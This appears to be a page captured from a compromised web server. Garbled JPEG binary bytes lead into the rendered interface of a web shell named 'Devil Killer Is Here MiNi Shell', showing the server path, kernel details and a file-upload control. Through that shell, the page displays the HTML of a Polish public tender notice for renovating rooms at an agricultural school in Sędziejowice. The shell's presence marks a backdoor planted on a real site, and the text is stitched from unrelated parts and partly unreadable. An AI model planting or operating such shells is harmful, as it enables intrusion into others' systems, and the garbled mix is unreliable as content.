JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241114/0059412301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont pomieszczeń w ZSCKR w Sędziejowicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół Centrum Kształcenia Rolniczego im. Władysława Grabskiego w Sędziejowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000095615</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolonia 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sędziejowice-Kolonia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-160</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">43 677 10 04</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zsckrsedziejowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zsrgrabski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont pomieszczeń w ZSCKR w Sędziejowicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-94b87223-c71d-4fec-a852-38634bbdc915</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00594123</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00278117/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Remont pomieszczeń w ZSCKR w Sędziejowicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-94b87223-c71d-4fec-a852-38634bbdc915 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://www.ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu prowadzona jest zgodnie z postanowieniami<br/>Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>22<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U. z 2020 r., poz. 2452).<br/>Komunikacja w postępowaniu, z wyłączeniem składania ofert, które należy<br/>złożyć elektronicznie, w sposób opisany w cz. XVI SWZ, odbywa się drogą<br/>elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w<br/>zakładce „Formularze” („Formularze do komunikacji”).<br/>Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności<br/>przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie<br/>odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie<br/>załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem<br/>Prezesa Rady Ministrów w sprawie wymagań dla dokumentów<br/>elektronicznych opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z<br/>wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie<br/>zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym<br/>lub wewnętrznym.<br/>W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje<br/>się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z<br/>wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym<br/>podpisem (typ wewnętrzny).<br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w<br/>pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie<br/>eZamówienia.<br/>Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań<br/>dotyczących treści dokumentów zamówienia wystarczające jest posiadanie<br/>tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości<br/>widoczne są po zalogowaniu w podglądzie postępowania w zakładce<br/>„Komunikacja”.<br/>Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w<br/>inny sposób niż przy użyciu środków komunikacji elektronicznej,<br/>wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119<br/>z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>- Administratorem danych osobowych Wykonawcy jest - Dyrektor Zespołu Szkół<br/>Centrum Kształcenia Rolniczego im. Władysława Grabskiego w Sędziejowicach,<br/>Sędziejowice - Kolonia 10, 98 - 160 Sędziejowice. Inspektorem danych osobowych jest<br/>Pan Michał Bartela. Telefon do szkoły - 43 677 10 04. Adres email: sekretariat@zs<br/>ckrsedziejowice .pl<br/>- Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w<br/>celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego<br/>oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny<br/>stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający<br/>na Zamawiającym – w oparciu o przepisy ustawy Prawo zamówień publicznych oraz<br/>aktów wykonawczych do Pzp.<br/>- Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 Pzp.<br/>- Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp, przez okres<br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Obowiązek<br/>podania przez Państwa danych osobowych bezpośrednio Państwa dotyczących jest wymogiem<br/>ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>Pzp.<br/>- Państwa dane osobowe nie będą przetwarzane w sposób zautomatyzowany oraz<br/>nie będą podlegały profilowaniu, stosowanie do art. 22 RODO.<br/>- Do Państwa danych osobowych mogą mieć dostęp, wyłącznie na podstawie zawartych<br/>umów powierzenia przetwarzania, podmioty zewnętrzne realizujące usługi na rzecz<br/>zamawiającego, nadto podmioty korzystające z Biuletynu Informacji Publicznej, Biuletynu<br/>Zamówień Publicznych, systemu E-zamówienia, Bazy konkurencyjności oraz internetowej<br/>platformy zakupowej e-Katalogi, będącej w gestii Urzędu Zamówień Publicznych.<br/>- W związku z przetwarzaniem Państwa danych osobowych jesteście Państwo<br/>uprawnieni do:<br/>a)dostępu do swoich danych osobowych – na podstawie art. 15 RODO,<br/>b)sprostowania lub uzupełnienia swoich danych osobowych – na podstawie art. 16 RODO,<br/>przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować<br/>33<br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników.<br/>c) żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w<br/>celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej<br/>osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia postępowania o udzielenie zamówienia,<br/>d)prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają<br/>Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy<br/>RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Państwu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO.<br/>Jednocześnie Zamawiający przypomina o ciążącym na Państwu obowiązku<br/>informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane<br/>przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które<br/>Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba<br/>że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSCKR.16.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest remont pomieszczeń (załącznik nr 1 do SWZ) w ZSCKR w Sędziejowicach, obejmujący m.in. swoim zakresem: <br/>• Demontaż posadzek – terakoty. lastriko; <br/>• Zrywanie starych powłok malarskich; <br/>• Miejscowe uzupełnienie wylewek posadzkowych, wyrównanie, <br/>gruntowanie; <br/>• Ułożenie wykładziny PCV elastycznej homogenicznej z cokołami z wykładziny; <br/>• Wykonanie tynków i gładzi na ścianach i części sufitów; <br/>• Montaż sufitów z płyt g-k; <br/>• Gruntowanie; <br/>• Obsadzenie narożników aluminiowych; <br/>• Wykonanie nakładek na parapety z PCV; <br/>• Malowanie ścian i sufitów; <br/>• Demontaż ościeżnic i drzwi <br/>• Montaż nowych ościeżnic i drzwi <br/>• Usunięcie istniejącej instalacji elektrycznej: oprawy, okablowania, łączników i gniazd; <br/>• Wykonanie nowej instalacji elektrycznej z oprawami oświetleniowymi, łącznikami i gniazdami; <br/>• Montaż gniazd internetowych, podtynkowych; <br/>• Opuszczenie i wymiana kratek wentylacyjnych <br/>- zgodnie z dokumentacją zawartą w załącznikach do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający zastosuje<br/>następujące kryteria oceny ofert, przypisując im odpowiednią wagę punktową<br/>zakładając, że w zakresie każdego kryterium wyboru oferty najkorzystniejszej 1% wagi<br/>kryterium = 1 punkt. Cena oferty brutto w PLN (C) 60,00% 60 punktów. Długość okresu gwarancji (D) 40,00% 40 punktów. 1) W przypadku kryterium „Cena brutto&#34; oferta otrzyma zaokrągloną do dwóch miejsc<br/>po przecinku ilość punktów wynikającą z działania:<br/>CN<br/>C = ----------------------------------- x 60 pkt<br/>COB<br/>a) Maksymalna liczba punktów jaką może uzyskać oferta w kryterium oceny ofert<br/>jakim jest „Cena brutto” wynosi – 60 pkt.<br/>b) Zgodnie z art. 225 pkt 1 Pzp, w przypadku, gdy wybór oferty prowadziłby do<br/>powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od<br/>towarów i usług, do ceny najkorzystniejszej oferty lub oferty z najniższą ceną zostanie<br/>odpowiednio doliczony podatek VAT, który Zamawiający miałby obowiązek rozliczyć<br/>zgodnie z tymi przepisami.<br/>3. Zasady oceny ofert wg kryterium „Długość okresu gwarancji” (D) :<br/>a) Wykonawca zobowiązany jest udzielić co najmniej 36 miesięcznej gwarancji na<br/>całość przedmiotu zamówienia. Zamawiający przyzna punkty, jeśli Wykonawca wydłuży<br/>okres gwarancji do 48 miesięcy lub 60 miesięcy. Wykonawca otrzyma 40 pkt – w przypadku wydłużenia okresu<br/>gwarancji do 60 miesięcy.<br/>Wykonawca otrzyma 20 pkt – w przypadku wydłużenia okresu<br/>gwarancji do 48 miesięcy<br/>Wykonawca otrzyma 0 pkt – w przypadku utrzymania<br/>minimalnego okresu gwarancji (tj. 36 miesięcy gwarancji na<br/>przedmiot dostawy). Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów<br/>ze wszystkich kryteriów. Uzyskana liczba punktów w ramach kryterium zaokrąglona<br/>będzie do drugiego miejsca po przecinku. Jeżeli trzecia cyfra po przecinku (i/lub<br/>następne) jest mniejsza od 5 wynik zostanie zaokrąglony w dół, a jeżeli cyfra jest równa<br/>lub większa od 5 wynik zostanie zaokrąglony w górę. Przy ocenie ofert wartość wagowa wyrażona w procentach będzie wyrażona w<br/>punktach:<br/>(1 % = 1 pkt.)<br/>d) Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z<br/>dokładnością do dwóch miejsc po przecinku, przy wykorzystaniu matematycznych<br/>zasad zaokrąglania; najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>e) Zamawiający udzieli zamówienia temu (tym) Wykonawcy<br/>(Wykonawcom),którego(ych) oferta zostanie uznana za najkorzystniejszą, tj. uzyska<br/>największą łączną ilość punktów ze wszystkich kryteriów.<br/>f) Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej<br/>ofert przedstawiają taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert,<br/>Zamawiający:<br/>- spośród tych ofert wybiera ofertę, która otrzymała najwyższą ocenę w kryterium<br/>o najwyższej wadze.<br/>- jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze,<br/>Zamawiający wybiera ofertę z najniższą ceną lub najniższym kosztem.<br/>g) Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa powyżej w pkt f) ,<br/>Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie<br/>określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę lub koszt,<br/>przy czym, Wykonawcy składający oferty dodatkowe nie mogą zaoferować cen lub<br/>kosztów wyższych niż zaoferowane w uprzednio złożonych ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają <br/>wykluczeniu na zasadach określonych w cz. VII SWZ, oraz spełniają warunki udziału w <br/>postępowaniu, określone na podstawie art. 112 Pzp dotyczące: <br/>1) zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>11 <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub <br/>zawodowej, o ile wynika to z odrębnych przepisów; Zamawiający nie stawia <br/>warunku w powyższym zakresie. <br/>3) sytuacji ekonomicznej lub finansowej: <br/>Zamawiający wymaga posiadania ubezpieczenia od odpowiedzialności cywilnej w <br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę <br/>gwarancyjną minimum 500 000.000 zł. - <br/>Jeżeli w trakcie realizacji umowy polisa straci ważność, Wykonawca jest <br/>zobowiązany do przedłożenia kserokopii nowej polisy poświadczonej za zgodność z <br/>oryginałem. - <br/>Wartości podane w dokumentach w walutach innych niż wskazane przez <br/>Zamawiającego wykonawca przeliczy wg średniego kursu NBP na dzień wystawienia <br/>dokumentu. <br/>4) zdolności technicznej lub zawodowej: <br/>a) doświadczenie - <br/>Wykonawca spełni warunek, jeżeli wykaże (Załącznik Nr 3 do SWZ), że <br/>zrealizował należycie/zakończył, w okresie ostatnich 5 lat przed upływem terminu <br/>składania ofert, co najmniej 2 roboty budowlane (o wartości każdej z tych robót <br/>minimum 700 000,00 zł), a jeżeli okres prowadzenia działalności jest krótszy w tym <br/>okresie, co najmniej 3 roboty budowlane (o wartości każdej z tych robót minimum <br/>500 000,00 zł) odpowiadające swoim rodzajem robotom budowlanym stanowiącym <br/>przedmiot zamówienia, polegających na wykonywaniu prac ogólnobudowlanych, <br/>hydraulicznych i elektrycznych w budynkach. - <br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych <br/>wykonywanych wspólnie z innymi Wykonawcami, wykaz winien zawierać roboty, w <br/>których wykonaniu Wykonawca bezpośrednio uczestniczył. <br/>Wzór wykazu robót stanowi załącznik do SWZ. <br/>b) posiadanie osób kierowanych przez Wykonawcę do realizacji zamówienia: <br/>Zamawiający uzna ten warunek za spełniony w przypadku, gdy Wykonawca wykaże, że <br/>dysponuje i skieruje do realizacji zamówienia, co najmniej: - <br/>1 osobę posiadającą uprawnienia budowlane do kierowania robotami <br/>budowlanymi bez ograniczeń w specjalności konstrukcyjno – budowlanej bez <br/>ograniczeń, wpis na listę członków właściwej izby samorządu zawodowego oraz ważne <br/>zaświadczenie potwierdzające przynależność do właściwej izby samorządu zawodowego, <br/>która będzie pełnić bezpośrednio obowiązki kierownika robót; <br/>12 <br/>- <br/>1 osobę posiadającą uprawnienia do kierowania robotami budowlanymi w <br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń 